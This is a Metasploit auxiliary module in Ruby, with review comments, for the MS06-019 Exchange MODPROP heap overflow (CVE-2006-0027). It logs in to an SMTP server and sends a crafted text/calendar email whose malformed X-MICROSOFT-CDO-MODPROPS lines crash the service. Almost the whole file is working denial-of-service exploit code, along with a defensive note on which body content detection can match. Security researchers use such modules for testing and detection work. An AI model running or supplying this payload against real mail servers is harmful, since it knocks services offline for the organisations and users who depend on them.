##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary DoS module for MS06-019 (CVE-2006-0027). It logs in to an SMTP
# server and delivers one e-mail carrying a text/calendar part whose VEVENT
# blocks contain malformed X-MICROSOFT-CDO-MODPROPS values. The module sends
# a single message and then reads one response line; it does not check
# whether the target was actually affected (see 'Reliability' below).
#
# From a defensive point of view, the distinguishing content is in the
# message body itself (the text/calendar part and the X-MICROSOFT-CDO-MODPROPS
# lines built in #run), so it is visible to any SMTP content inspection that
# parses the MIME body; the envelope fields (MAILFROM/MAILTO/SUBJECT) are all
# user-supplied options and carry no fixed indicator.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Smtp
  include Msf::Auxiliary::Dos

  # Registers module metadata and the single extra option (SUBJECT).
  # MAILFROM/MAILTO and the connection options come from the Smtp mixin.
  #
  # @param info [Hash] module info supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'MS06-019 Exchange MODPROP Heap Overflow',
        'Description' => %q{
          This module triggers a heap overflow vulnerability in MS
          Exchange that occurs when multiple malformed MODPROP values
          occur in a VCAL request.
        },
        'Author' => [ 'pusscat' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'BID', '17908'],
          [ 'CVE', '2006-0027'],
          [ 'MSB', 'MS06-019'],

        ],
        # NOTE(review): this date predates the CVE (2006) and MS06-019 bulletin
        # identifiers listed above; confirm against the references.
        'DisclosureDate' => '2004-11-12',
        'Notes' => {
          # Crashes the service; there is no cleanup or recovery step in #run.
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('SUBJECT', [ true, 'The subject of the e-mail', 're: Your Brains'])
      ]
    )
  end

  #
  # This needs some reworking to use the SMTPDeliver mixin and the Re::MIME class
  #
  # Builds the MIME message by hand and writes it straight to the socket,
  # followed by QUIT. Note that everything computed in the randomisation
  # section is discarded: modpropshort, modproplong and modpropbusted are all
  # reassigned to fixed literals just before the message is assembled, so the
  # only randomised bytes that reach the wire are the MIME boundary.
  #
  # @return [void]
  def run
    # Smtp mixin: opens the connection and completes the greeting/auth exchange.
    connect_login

    # Candidate MODPROP names used only by the randomisation below (dead code).
    modprops = [
      'attendee', 'categories', 'class', 'created', 'description',
      'dtstamp', 'duration', 'last-modified',
      'location', 'organizer', 'priority', 'recurrence-id', 'sequence',
      'status', 'summary', 'transp', 'uid'
    ]

    # modprops = ['dtstamp']

    modpropshort = ''
    modpropbusted = ''
    modnum = rand(3)

    # rand(3) may be 0, in which case this loop body never runs.
    1.upto(modnum) do
      nextprop = rand(modprops.size)
      modpropshort << modprops[nextprop] + ','
      modpropbusted << modprops[nextprop].upcase + ":\r\n"
    end

    # The loop results above are overwritten here.
    modpropshort = 'dtstamp,'
    modpropbusted = "DTSTAMP:\r\n"
    modnum = modnum + 1 + rand(3)
    # This is an alias, not a copy: the << below mutates the same String
    # object, so modpropshort changes along with modproplong. Harmless here
    # only because both are reassigned again before use.
    modproplong = modpropshort
    1.upto(modnum) do
      modproplong << modprops[rand(modprops.size)] + ','
    end

    # Random MIME boundary; the only per-run variation in the message body.
    boundary = Rex::Text.rand_text_alphanumeric(8) + '.' + Rex::Text.rand_text_alphanumeric(8)

    # Really, the randomization above only crashes /sometimes/ - it's MUCH more
    # reliable, and gives crashes in better spots if you use these modprops:

    # Final values actually sent; each is later .chop'ed to drop the trailing comma.
    modpropshort = 'dtstamp,'
    modproplong = 'dtstamp, dtstamp,'
    modpropbusted = "DTSTAMP:\r\n"

    # Headers are built from datastore values verbatim; no escaping or
    # validation is applied to MAILFROM/MAILTO/SUBJECT.
    mail = "From: #{datastore['MAILFROM']}\r\n"
    mail << "To: #{datastore['MAILTO']}\r\n"
    mail << "Subject: #{datastore['SUBJECT']}\r\n"
    mail << "Content-class: urn:content-classes:calendarmessage\r\n"
    mail << "MIME-Version: 1.0\r\n"
    mail << "Content-Type: multipart/alternative;boundary=\"#{boundary}\"\r\n"
    mail << "X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0\r\n"
    mail << "\r\n"
    mail << "--#{boundary}\r\n"
    mail << "Content-class: urn:content-classes:calendarmessage\r\n"
    mail << "Content-Type: text/calendar; method=REQUEST; name=\"meeting.ics\"\r\n"
    mail << "Content-Transfer-Encoding: 8bit\r\n"
    mail << "\r\n"
    # Two VEVENT blocks: the first carries the short MODPROPS list plus the
    # bare "DTSTAMP:" line, the second only the longer MODPROPS list.
    mail << "BEGIN:VCALENDAR\r\n"
    mail << "BEGIN:VEVENT\r\n"
    mail << "X-MICROSOFT-CDO-MODPROPS:#{modpropshort.chop}\r\n"
    mail << modpropbusted
    mail << "END:VEVENT\r\n"
    mail << "BEGIN:VEVENT\r\n"
    mail << "X-MICROSOFT-CDO-MODPROPS:#{modproplong.chop}\r\n"
    mail << "END:VEVENT\r\n"
    mail << "END:VCALENDAR\r\n"
    # Note: the closing boundary lacks the trailing "--" that ends a multipart body.
    mail << "\r\n--#{boundary}\r\n"
    # DATA terminator: the message is written in one go, so the SMTP
    # DATA command itself is expected to be part of what the mixin exchanged.
    mail << "\r\n.\r\n"

    print_status('Sending message...')
    sock.put(mail)
    sock.put("QUIT\r\n")
    # get_once can return nil if the peer closes without replying; the || ''
    # keeps the concatenation from raising in that case.
    print '<< ' + (sock.get_once || '')
    disconnect
  end
end